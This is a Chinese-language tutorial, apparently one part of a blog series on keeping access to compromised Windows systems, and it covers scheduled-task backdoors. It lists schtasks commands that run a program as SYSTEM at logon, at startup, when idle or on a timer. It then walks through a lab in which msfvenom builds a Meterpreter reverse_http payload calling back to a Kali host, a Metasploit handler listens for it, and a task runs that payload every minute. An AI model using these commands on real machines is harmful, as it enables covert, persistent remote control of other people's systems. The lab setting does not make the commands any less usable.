系列文章
操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
计划任务维持后门
计划任务
计划任务是系统的常见功能,利用任务计划功能,可以将任何脚本、程序或文档安排在某个最方便的时间运行。任务计划可以在每次系统启动的时候启动并在后台运行
(1)打开计划任务
1、【管理工具】—>【任务计划程序】
2、【控制面板】—>系统和安全–【计划任务】
3、【taskschd.msc】命令
(2)使用命令去生成计划任务
使用以下命令进行测试
1、在每个任意用户登录中以SYSTEM的形式执行计划任务:
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onlogon /ru System
2、在系统启动期间或用户会话处于非活动状态(空闲模式)时执行
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onidle /i 30
3、在系统启动的时候以SYSTEM的形式执行计划任务:
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onstart /ru System
4、计划任务以 System 权限每10分钟运行一次
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc minute/mo 10 /ru system
计划任务后门
实验环境
| 机器名 | IP |
|---|---|
| kali | 192.168.52.130 |
| Win10 | 192.168.52.131 |
生成msf木马文件
msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe
我们将我们的恶意文件上传到目标服务器上
kali机器开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run
在目标机器上创建计划任务,每一分钟去执行一次shell.exe
schtasks /create /tn test /sc minute /mo 1 /tr C:\Users\Administart\Desktop\shell.exe /ru system /f
等待一分钟,kali收到监听会话
